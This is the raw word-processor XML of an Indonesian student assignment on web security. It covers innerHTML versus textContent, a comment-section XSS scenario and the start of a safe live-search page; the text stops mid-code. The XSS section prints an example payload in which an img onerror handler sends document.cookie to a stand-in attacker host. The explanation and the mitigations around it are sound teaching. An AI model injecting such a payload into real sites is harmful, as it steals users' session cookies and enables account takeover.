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336B81" w14:textId="5DF0FB85" w:rsidR="00E259FB" w:rsidRPr="003D3392" w:rsidRDefault="00E259FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3392">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Dharma Satriadi (25120300030)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEC5DB" w14:textId="73D172F1" w:rsidR="0040548A" w:rsidRPr="003D3392" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3392">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Soal 1 — innerHTML vs textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF93D39" w14:textId="1414EA91" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Dalam pengembangan aplikasi berbasis web, terdapat dua properti utama yang digunakan untuk memanipulasi isi suatu elemen HTML melalui Document Object Model (DOM), yaitu innerHTML dan textContent. Properti innerHTML berfungsi untuk membaca maupun menuliskan isi suatu elemen dalam bentuk markup HTML, sehingga string yang dimasukkan ke dalamnya akan diinterpretasikan dan dirender sebagai kode HTML oleh peramban (browser). Sebaliknya, properti textContent memperlakukan seluruh isi yang dimasukkan sebagai teks murni, tanpa melakukan proses penguraia</w:t>
      </w:r>
      <w:r w:rsidR="003D3392">
        <w:t xml:space="preserve">                                                                                                                         </w:t>
      </w:r>
      <w:r>
        <w:t>n (parsing) terhadap tag maupun atribut HTML di dalamnya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE854D" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Perbedaan mendasar tersebut membawa implikasi langsung pada aspek keamanan aplikasi. Penggunaan innerHTML untuk menampilkan data yang berasal dari input pengguna berpotensi menimbulkan celah keamanan berupa Cross-Site Scripting (XSS), sebagaimana diuraikan pada Soal 2, mengingat tag seperti &lt;script&gt; akan dieksekusi sebagai kode aktif apabila disisipkan melalui properti tersebut. Hal ini menyebabkan innerHTML sebaiknya hanya digunakan pada kondisi tertentu, yaitu ketika markup HTML memang perlu disisipkan dan sumber data telah dipastikan aman atau telah melalui proses penyaringan (sanitasi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CD3C2" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Sejalan dengan hal tersebut, penggunaan textContent direkomendasikan sebagai pilihan utama pada saat menampilkan data yang bersumber dari input pengguna maupun sumber eksternal yang belum terverifikasi keamanannya. Sebagai ilustrasi, penggunaan innerHTML dapat diamati pada contoh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48A" w14:paraId="352CA76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57948BD2" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>elemen.innerHTML = "&lt;strong&gt;" + namaPengguna + "&lt;/strong&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C4E907" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// tag &lt;strong&gt; akan dirender sebagai elemen HTML aktif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45EDF75A" w14:textId="77777777" w:rsidR="003D3392" w:rsidRDefault="003D3392">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1F0FFC" w14:textId="190DEA9B" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Sementara itu, penerapan textContent yang lebih aman untuk kasus serupa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48A" w14:paraId="754D7BF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7BB4E9CB" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>elemen.textContent = namaPengguna;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667A1A3D" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// seluruh isi namaPengguna diperlakukan sebagai teks, bukan markup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D6BFDA6" w14:textId="77777777" w:rsidR="003D3392" w:rsidRDefault="003D3392">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389A6CFB" w14:textId="553716A1" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Berdasarkan uraian tersebut, dapat disimpulkan bahwa pemilihan antara innerHTML dan textContent perlu disesuaikan dengan kebutuhan penyisipan markup serta tingkat kepercayaan terhadap sumber data yang akan ditampilkan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753AB62" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE28C0A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRPr="003D3392" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3392">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Soal 2 — Skenario Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312359BD" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerentanan yang Dihadapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436761C" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Salah satu skenario nyata yang menggambarkan risiko Cross-Site Scripting (XSS) adalah fitur kolom komentar pada suatu platform blog atau media sosial. Pada skenario tersebut, sistem menampilkan komentar yang dimasukkan pengguna secara langsung ke halaman menggunakan innerHTML tanpa melalui proses validasi maupun penyaringan (sanitasi) terlebih dahulu. Kondisi tersebut menyebabkan setiap tag maupun atribut event berbahaya yang disertakan pengguna turut dirender oleh peramban milik pengguna lain yang membuka halaman yang sama.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DF0D5" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proses Eksploitasi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECDAFE" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Pelaku dapat memanfaatkan celah tersebut dengan memasukkan komentar yang berisi tag gambar (&lt;img&gt;) dengan atribut src yang sengaja dibuat tidak valid, sehingga atribut onerror miliknya akan dieksekusi oleh peramban. Pendekatan ini perlu ditegaskan, mengingat tag &lt;script&gt; yang disisipkan melalui innerHTML tidak akan dieksekusi oleh peramban modern, sehingga celah XSS pada praktiknya lebih sering dieksploitasi melalui atribut event seperti onerror maupun onload, sebagaimana dicontohkan pada cuplikan kode berikut. Pada saat pengguna lain membuka halaman yang menampilkan komentar tersebut, kode yang disisipkan akan tereksekusi secara otomatis pada peramban milik pengguna tersebut tanpa disadari, sehingga data sesi (cookie) milik pengguna turut terkirim ke server milik pelaku.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48A" w14:paraId="2F6EA81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379A2448" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;img src="x" onerror="fetch('https://situs-penyerang.com/curi?cookie=' + document.cookie)"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4623E910" w14:textId="77777777" w:rsidR="003D3392" w:rsidRDefault="003D3392">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43341EBA" w14:textId="72EE9701" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dampak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B9645" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Hal ini berimplikasi pada risiko pengambilalihan sesi (session hijacking), di mana pelaku dapat menggunakan cookie yang diperoleh untuk masuk ke akun korban tanpa memerlukan kredensial (nama pengguna dan kata sandi). Selain risiko tersebut, skrip yang disisipkan juga berpotensi digunakan untuk mengarahkan pengguna ke situs phishing, mencuri data formulir, maupun menyebarkan skrip serupa ke pengguna lain secara berantai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310A099" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigasi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDC4A7" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Guna mencegah kerentanan tersebut, terdapat beberapa langkah yang perlu dilakukan, yaitu: (1) melakukan penyaringan (sanitasi) dan validasi terhadap seluruh input pengguna sebelum disimpan maupun ditampilkan; (2) menggunakan textContent atau metode escaping karakter khusus HTML pada saat menampilkan data yang bersumber dari input pengguna, sebagaimana diuraikan pada Soal 1; serta (3) menerapkan kebijakan Content Security Policy (CSP) pada tingkat server guna membatasi sumber skrip yang diizinkan untuk dieksekusi pada halaman.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E27E9" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E0F68" w14:textId="77777777" w:rsidR="0040548A" w:rsidRPr="003D3392" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3392">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Soal 3 — Live Search dengan createElement &amp; textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651C2B4" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Implementasi berikut menyediakan fitur pencarian data secara langsung (real-time) menggunakan array data statis sebagai sumber. Proses penyaringan dilakukan melalui metode array.filter() setiap kali peristiwa (event) input terjadi pada kolom pencarian, kemudian hasil penyaringan ditampilkan kembali (re-render) ke dalam elemen daftar melalui kombinasi document.createElement() dan textContent, tanpa menggunakan innerHTML, guna memastikan keamanan terhadap potensi celah Cross-Site Scripting sebagaimana diuraikan pada Soal 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A73686" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Berkas: 25120300030_Dharma.html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48A" w14:paraId="0E673E4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7EE3A94A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE26A53" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;html lang="id"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F15E850" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167E3023" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;meta charset="UTF-8"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020977D9" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;title&gt;Sistem Pencarian Data Tenant — Gaya JIEP&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40477E19" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BD5CC1" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  body { font-family: Georgia, 'Times New Roman', serif; max-width: 640px; margin: 40px auto; color: #1a1a1a; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="289C1029" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  h1 { font-size: 20px; border-bottom: 2px solid #14532d; padding-bottom: 8px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0624C9A4" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #kolomPencarian { width: 100%; padding: 8px; font-size: 15px; box-sizing: border-box; margin-bottom: 16px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C585CC3" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #daftarHasil { list-style: none; padding: 0; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EB89EA" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #daftarHasil li { padding: 8px 12px; border-bottom: 1px solid #ddd; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B16D77D" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #keteranganJumlah { color: #555; font-size: 13px; margin-bottom: 8px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06558518" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DFA36B" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338CEE1A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4097380F" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="044E5E69" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;h1&gt;Sistem Pencarian Data Tenant Kawasan Industri&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D889625" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;p&gt;Fitur berikut disediakan guna mempermudah proses pencarian data tenant secara langsung (&lt;em&gt;real-time&lt;/em&gt;) berdasarkan kata kunci yang dimasukkan pengguna.&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF4E588" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D164EF3" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;input type="text" id="kolomPencarian" placeholder="Masukkan kata kunci pencarian..."&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDF911F" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;p id="keteranganJumlah"&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACF5216" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;ul id="daftarHasil"&gt;&lt;/ul&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8D118C" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E715EF" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30411EDB" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Data sumber utama. Dalam penerapan produksi, data ini diperoleh dari basis data tenant.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4997C4" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const dataSumberTenant = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B501CBD" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Sumber Makmur Sejahtera",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6B2CAA" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Cipta Karya Industri",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099D63D5" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Nusantara Logistik Terpadu",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760B8F68" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Anugerah Pratama Mandiri",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34898F5A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Karya Utama Perkasa",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4D523B" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Bumi Sentosa Abadi",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D584F70" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Graha Mitra Industri",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEC69C2" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Sinar Cahaya Teknik",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BA20ACC" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Wahana Sukses Bersama",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22850D5A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
